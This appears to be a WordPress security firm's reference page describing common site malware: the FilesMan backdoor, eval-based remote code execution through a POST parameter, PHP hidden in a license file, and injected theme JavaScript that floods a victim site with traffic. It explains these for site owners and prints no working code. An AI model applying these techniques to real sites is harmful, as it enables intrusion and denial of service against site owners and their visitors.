Some common Malware for reference



FilesMan

FilesMan is a backdoor which allows unauthorized access/creation/modification of your website files via PHP requests.

There are unlimited variance of FilesMan we have seen. One of which is as attached for reference.



Remote Arbitrary Code Execution

The left-hand-side image shows a piece of hidden code. If we decode it, it means –

eval() means Evaluate a string as PHP code (execute the content)

Apparently, it is a tool for remote arbitrary code execution.
Everything PHP commands passed to nf0b08a via HTTP POST request, it will be executed.
(HTTP POST is a very common request used in our daily life, e.g. input username/password to login)



Remote Arbitrary Code Execution (more complex)

A much more complex remote arbitrary code execution malware



Hidden Malware

Some malwares are hidden in apparent text file (e.g. License file)
(there are some other malicious PHP commands inside other sections in the example file)

malicious PHP commands hidden in apparent license file



Excessive Traffic

The image shows a code being injected into wp_content/themes/xxxx/header.php

This JavaScript will be bundled to your WordPress website visitors’ browsers (as a part of theme content).

From the code, the visitor browser will visit the URL http://www.ac???.e?/js/… every 10 seconds, and generate unnecessary and excessive traffic to the victim website.

When this malware is widely distributed, they will generate a large amount of excessive traffic against the victim website, and may make the victim website server slow, or even inaccessible.
(In the example, the victim website is www.ac???.e? one)

Generate excessive traffic against victim website

About RecoverWP.com

RecoverWP.com is managed by web hosting professionals, who have been working on web hosting, WordPress website, security and vulnerabilities area since 2003.